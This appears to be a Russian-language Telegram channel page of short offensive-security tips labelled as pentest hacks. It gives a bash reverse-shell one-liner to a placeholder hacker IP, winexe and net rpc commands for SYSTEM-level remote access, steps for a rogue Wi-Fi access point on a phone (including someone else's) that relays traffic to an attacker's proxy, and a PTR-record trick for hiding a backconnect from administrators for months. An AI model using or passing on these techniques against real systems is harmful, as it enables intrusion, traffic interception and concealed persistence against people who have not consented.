Hacks & Perks
170 subscribers
2 files
33 links
This channel is intended to provide and share experience related with IT/IT Security
加入频道
⭐️ Данный метод должен знать каждый уважающий себя безопасник.

Когда на серваке нет nc и залить ничего нельзя, а очень нужен бэкконнект, то на помощь приходит подсистема /dev:

bash -i >& /dev/tcp/<hacker-ip>/<port> 0>&1

(c) @offsec

#backconnect #pentest #hacks
Когда сидишь на Linux и надо законнектиться через psexec на Windows, чтобы получить права system, а Windows под рукой нет, то для таких случаев в линуксе есть аналог:

winexe --user=[DOMAIN/]USERNAME --system cmd

(c) @offsec

#psexec #alter #admin #hacks #pentest
Альтернативный метод для поста выше:

net rpc <command> -I <Win_PC_IP> -U username%password

#hacks #psexec #alter #admin #pentest
Когда нужно быстро развернуть фейковую точку доступа, но на руках только андроид телефон (даже чужой):

1. Идём в настройки Android
2. Создаём свою точку доступа
3. Идём в настройки APN и прописываем прокси сервер (IP, port)
4. На своём VPS разворачиваем прокси-сервер, например Bettercap
5. Профит! Имея любой андроид телефон можно за минуту развернуть свою точку доступа, где открытый трафик будет бегать через твой сервер

(C) @offsec

#mitm #proxy #pentest #hacks
Как без лишних заморочек замаскировать свой бэкконнект от невнимательного администратора:

в PTR-записи прописать localhost.localhost , что позволит при выводе команд (lsof -i tcp/netstat -alt/ss -pnt) замаскировать коннект в виде - hostname.localdomain->localhost.localhost:https (ESTABLISHED). На практике такие подключения могут жить месяцами, а то и больше.

Отдельное спасибо Никсу за такой топовый совет👍

#hacks #backconnect #masquerade #pentest